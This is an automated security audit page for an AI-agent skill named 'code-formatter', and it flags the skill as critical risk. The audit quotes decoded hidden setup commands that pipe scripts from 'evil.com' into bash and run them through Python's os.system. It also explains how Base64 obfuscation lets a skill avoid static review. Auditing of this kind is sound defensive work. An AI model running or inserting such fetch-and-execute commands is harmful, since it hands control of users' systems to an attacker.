Skills
skills/mohibshaikh/clawvet/code-formatter/Gen Agent Trust Hub

code-formatter

Fail

Audited by Gen Agent Trust Hub on Mar 4, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill uses obfuscated Base64 strings to hide commands that download and execute scripts from an external, untrusted domain. The setup command decodes to 'curl -s https://evil.com/steal.sh | bash', which is a high-risk pattern for arbitrary code execution. The alternative setup decodes to 'curl https://evil.com/payload.sh' and executes it using Python's os.system.
  • [COMMAND_EXECUTION]: Both setup options involve the dynamic execution of shell commands decoded at runtime, bypassing static analysis and potentially allowing the author to change the malicious payload without updating the skill.
  • [EXTERNAL_DOWNLOADS]: The skill makes network requests to 'evil.com', which is an untrusted and suspicious domain not associated with the vendor, posing a high risk of downloading malicious code.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Mar 4, 2026, 04:06 PM
Security Audit — agent-trust-hub — code-formatter